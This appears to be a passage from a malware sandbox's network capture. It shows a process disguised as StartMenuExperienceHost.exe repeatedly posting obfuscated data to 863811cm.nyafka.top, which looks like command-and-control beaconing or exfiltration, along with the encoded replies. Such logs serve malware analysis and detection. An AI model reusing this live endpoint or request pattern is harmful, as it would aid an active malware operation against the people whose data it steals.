                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kh9DYwcZ9pWQBiZpe0cR7RmewUo251qkeHgCQ5hRhWix37%2BmTGlmUGswUlSR8%2FH9lAOw0EVpF02CCHyZq%2F7I1DyxsqJl%2F3aGFdoRLl%2BWBbIOg5HCgHqdPM70Lw888NndRtvoXFpb"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f90e9f79e04-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 3d 07 00 1e 20 3e 30 04 2f 08 3f 00 2a 5b 3e 5d 2b 57 34 02 25 1a 3b 17 2d 3c 07 1e 22 05 2f 00 3e 02 2a 5b 27 12 24 00 28 1b 2a 51 03 1b 3a 06 2b 33 23 1c 3c 22 08 06 28 54 32 06 30 1d 17 42 2a 2e 36 08 30 07 22 59 36 21 38 11 3e 3c 33 56 3b 15 3f 42 2a 28 08 13 37 3b 2a 5f 08 13 39 50 2a 06 3c 56 22 19 36 05 22 2d 24 0a 36 5f 39 08 3e 39 31 08 33 0d 30 58 2c 22 2c 5a 34 3f 30 0f 35 02 25 0b 37 13 30 58 25 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a
                                                                Data Ascii: 98'\= >0/?*[>]+W4%;-<"/>*['$(*Q:+3#<"(T20B*.60"Y6!8><3V;?B*(7;*_9P*<V"6"-$6_9>9130X,",Z4?05%70X%8"_")Q?TR
                                                                Oct 11, 2024 01:37:00.690242052 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.550007188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:00.676645994 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:01.035137892 CEST2584OUTData Raw: 50 58 58 58 54 54 5d 55 5e 5a 55 58 51 54 5a 5d 57 5b 58 5b 55 50 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PXXXTT]U^ZUXQTZ]W[X[UPQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9+ (3R&A(%$Y#+;[+ 6 70=->^4F51/)#Y$/\*%
                                                                Oct 11, 2024 01:37:01.130950928 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:01.382107973 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KAqCLeDyAYec8PkvcAX3N0BI%2B8kh9F2k%2F15E%2FEfAkM8sM3EgzvPpMeiPx85wiYn8ZcSZjFhU%2FHpAj3myAOYrJlBTGjhIA6gnkr9AKGYPW7mAc2oW7tPx3rcdhcysMV8N8ThTS2%2FO"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f95c9f90c7a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.550009188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:00.807497978 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:01.160176992 CEST2004OUTData Raw: 50 58 58 5d 54 5c 58 51 5e 5a 55 58 51 51 5a 5f 57 5b 58 5e 55 56 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PXX]T\XQ^ZUXQQZ_W[X^UVQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\)>(\+?%>/+6?!8,?%U 7'Q0=!(8#"X>#Y$/\*1
                                                                Oct 11, 2024 01:37:01.261552095 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:01.425812006 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J49WsGdkLI%2FxdZvMgt5wvkS4QeqjxJK1%2B52J%2FKJNxFZ0XfpP4aJClFCHWMutNzT1xD4EkawRrn69AS1ed9LXwIUPCrRvFlXwa4q3fQKmcZpQEpAqAyx6BS6y648Xgt6Loj%2B7dxXE"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f969a8419e7-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5f 29 2a 21 0a 34 10 02 04 38 22 38 10 3d 03 00 5c 28 1f 27 58 24 27 27 17 2c 3f 3d 54 22 2b 24 14 2a 05 2a 58 27 3c 23 5b 2b 21 2a 51 03 1b 39 5e 3c 0a 2f 13 2b 0b 39 17 28 1c 0b 1a 26 33 3a 1b 29 2d 29 1c 33 58 3e 14 21 08 38 55 29 3f 27 10 2f 15 2b 41 3d 2b 25 01 20 01 2a 5f 08 13 3a 09 29 3b 24 1e 21 34 3d 5e 35 13 3b 56 22 3a 2d 0f 29 5f 21 0d 24 23 05 01 3b 54 3c 12 20 2f 28 09 22 3c 36 55 20 2e 2c 5a 32 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'_)*!48"8=\('X$'',?=T"+$**X'<#[+!*Q9^</+9(&3:)-)3X>!8U)?'/+A=+% *_:);$!4=^5;V":-)_!$#;T< /("<6U .,Z2("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.550014188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:01.503961086 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:01.864434004 CEST2584OUTData Raw: 55 5d 5d 5a 54 5b 58 5e 5e 5a 55 58 51 5d 5a 5c 57 58 58 5c 55 5d 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]ZT[X^^ZUXQ]Z\WXX\U]QRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y(=+?0&8E? X";?\)3%S#'?V32=;75=+#Y$/\*
                                                                Oct 11, 2024 01:37:01.957967043 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:02.164912939 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hKOGxI6u5n3IYbfTkxqQPZsPlsNR5DoGMR%2Bnud3R%2BOQeH4pOJ6pPYEJgNLCdPqyh3hWa2chG4ODy8HSXVQyQXpGiAJql74FBhIaWIs0xKGfSHWUPTiAZc7G%2Bf%2B3UUUKkg2ONbbWB"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f9aea907c8d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.550015188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:01.541743040 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:01.895386934 CEST2004OUTData Raw: 50 5b 5d 58 51 58 58 51 5e 5a 55 58 51 5d 5a 5e 57 51 58 55 55 56 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[]XQXXQ^ZUXQ]Z^WQXUUVQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<.<X(<1<E< \6;<() $;P01T)8(51<_*+#Y$/\*
                                                                Oct 11, 2024 01:37:01.994879007 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:02.327075958 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qTSUjlPZzkse0LUyr8gerve5a8HRKoT7eanMj8DgMSA0XcOi%2Bfp%2BI6XkFAZOQnoDze2LbBsv3MrETO81ki9B2R1XgzaQe7zIb773aZMgiIhEcwYYFjkYSM3%2B8PPra7dHQT2o25Ut"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f9b288f0f95-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 58 3e 17 03 0f 20 2d 3f 1f 2f 0f 24 13 29 3d 08 58 3f 0f 0a 01 26 27 37 1a 39 2c 2a 0a 21 05 06 5f 3d 02 00 13 26 2f 2f 58 28 0b 2a 51 03 1b 39 1c 2b 0a 24 0f 28 54 31 5a 2b 54 39 14 24 33 3e 1b 29 2e 3d 51 24 2e 39 07 23 32 3c 55 28 2c 2f 55 2c 38 30 1a 29 01 3e 59 20 3b 2a 5f 08 13 3a 08 3e 06 3f 0f 35 27 35 5f 21 3d 23 54 22 17 00 14 3f 29 2d 0c 27 1d 0a 59 2c 31 23 07 34 3f 3c 0d 21 2f 2a 1d 34 2d 02 59 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'X> -?/$)=X?&'79,*!_=&//X(*Q9+$(T1Z+T9$3>).=Q$.9#2<U(,/U,80)>Y ;*_:>?5'5_!=#T"?)-'Y,1#4?<!/*4-Y&"_")Q?TR0
                                                                Oct 11, 2024 01:37:02.356952906 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:02.454045057 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:02.454662085 CEST2584OUTData Raw: 55 5f 5d 5c 51 59 58 52 5e 5a 55 58 51 5d 5a 53 57 5b 58 5d 55 54 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U_]\QYXR^ZUXQ]ZSW[X]UTQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?<?1>$B?%,!+,(U) 80-U>8?52#=+#Y$/\*
                                                                Oct 11, 2024 01:37:02.717705011 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Dd8G3wUY71vQd%2BqwGruAXhKWhd19pylufRyMBVtkaec1tNKZO%2FKlpO5O2wFTq4XgethffB19IsKj0zNxO%2Bt6hFhVOJIk5h4K7MSles7kwIw%2B58wwY%2Bxpc6Z2gSj%2BQiUwCXrHh3k"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f9e0bc20f95-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:02.950894117 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Dd8G3wUY71vQd%2BqwGruAXhKWhd19pylufRyMBVtkaec1tNKZO%2FKlpO5O2wFTq4XgethffB19IsKj0zNxO%2Bt6hFhVOJIk5h4K7MSles7kwIw%2B58wwY%2Bxpc6Z2gSj%2BQiUwCXrHh3k"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f9e0bc20f95-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.550020188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:02.496270895 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:02.847639084 CEST2004OUTData Raw: 50 5e 5d 5b 54 5d 5d 52 5e 5a 55 58 51 51 5a 58 57 5b 58 59 55 51 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^][T]]R^ZUXQQZXW[XYUQQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y+=+: 2>8D<4X#(0<" $ &>:=# !0=;#Y$/\*1
                                                                Oct 11, 2024 01:37:02.950959921 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:03.321943998 CEST740INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ia4tloko6IfDxTAUUjiJwaIcxtUHYikr6mIgF5%2Fq9gpgnfC3yJMUOlfm6AK9WAADNU6Pxb2OIaN66b42o7kngvOPKXVeanAvq34mUWJDdKltGD29TZp1dR2uqWwKKG4GTuPJSvZM"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fa11d5b80e0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 01 2a 00 26 1f 20 2e 05 5d 2d 21 24 5b 2b 2d 2a 5f 3c 21 2b 12 32 1d 3f 59 2d 2f 2a 0e 21 15 24 5c 3e 3c 2e 13 30 02 24 03 3c 0b 2a 51 03 1b 39 12 3c 23 24 08 28 1c 21 5d 28 31 3d 59 27 20 39 06 3d 3e 22 0f 27 2d 2e 15 22 31 2f 0d 2a 5a 33 52 2c 38 2f 08 2a 38 3a 5d 23 01 2a 5f 08 13 39 13 2a 3b 34 1e 36 0e 3d 5d 22 04 27 1d 22 17 2e 57 2a 29 2e 56 33 0d 2f 01 2f 0b 24 5f 20 06 3c 0c 21 02 0f 0d 34 04 20 10 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$*& .]-!$[+-*_<!+2?Y-/*!$\><.0$<*Q9<#$(!](1=Y' 9=>"'-."1/*Z3R,8/*8:]#*_9*;46=]"'".W*).V3//$_ <!4 %("_")Q?TR0
                                                                Oct 11, 2024 01:37:03.426218033 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1980
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:03.520462036 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:03.520757914 CEST1980OUTData Raw: 55 58 58 58 54 5b 58 5f 5e 5a 55 58 51 52 5a 5c 57 5e 58 5e 55 5d 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UXXXT[X_^ZUXQRZ\W^X^U]Q\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+. Y(\/&X$D<<#8/\+ >4$;&=U(+? 1?)#Y$/\*
                                                                Oct 11, 2024 01:37:03.779370070 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wXK2D%2FvI%2BrJUjeRQn0FxqjE5qOKBD6rTsPBGSIcYkBXB3B11B813TkWh%2BbWLEcGjEeDORHNrWI1juUvXXKRvbfa7mX1oc%2BVukfgk5tfcRlVN2WgvyLXcbnHmNznj7B4yGCj3Pb%2Bo"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fa4b8b080e0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 3e 17 26 53 23 58 2f 5b 2f 0f 2c 59 3d 3e 25 07 28 1f 3b 58 31 27 37 17 2d 02 08 0f 22 38 23 05 29 12 22 1c 27 2f 34 05 2b 31 2a 51 03 1b 39 5f 3c 0a 3b 56 3f 0b 39 5d 28 1c 25 15 27 33 3a 1d 3d 13 36 0e 33 3e 32 15 23 21 20 54 29 02 28 0d 2f 05 3f 40 3d 38 21 02 20 2b 2a 5f 08 13 3a 0c 28 38 28 1d 22 19 29 14 35 13 3f 57 22 17 2d 0a 3d 07 32 1d 33 33 05 01 2d 31 3f 00 37 3f 23 1c 35 3c 22 54 23 2e 3f 04 31 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\>&S#X/[/,Y=>%(;X1'7-"8#)"'/4+1*Q9_<;V?9](%'3:=63>2#! T)(/?@=8! +*_:(8(")5?W"-=233-1?7?#5<"T#.?1"_")Q?TR0
                                                                Oct 11, 2024 01:37:03.780378103 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:03.874893904 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:03.875116110 CEST2584OUTData Raw: 50 5f 58 5f 54 5c 58 50 5e 5a 55 58 51 52 5a 5a 57 58 58 5b 55 5c 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_X_T\XP^ZUXQRZZWXX[U\QZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(.3+*%='+%?!$?*#<$.=V= "'>#Y$/\*
                                                                Oct 11, 2024 01:37:04.125330925 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouyvuMqtoMsNfRobIJ2Qbqd6h9eHWO8RN1JfqbcG%2FZ5v9MBJvU2fX%2F88Km%2B7anWNQN2%2FfxkyqEufW4x2INCF5iPbjY%2BLeO5Ph%2FopbxEJNrjzgj2Q20xhPH0hxaMePYDOAJdli15O"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fa6eb1580e0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.550021188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:02.951217890 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:03.301130056 CEST2584OUTData Raw: 50 5c 5d 5a 54 5f 58 55 5e 5a 55 58 51 51 5a 59 57 5e 58 5c 55 56 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\]ZT_XU^ZUXQQZYW^X\UVQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(-7<(1>,?7"+<<)S#4$.!S=(4@5'>#Y$/\*1
                                                                Oct 11, 2024 01:37:03.404685020 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:03.668101072 CEST605INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:03 GMT
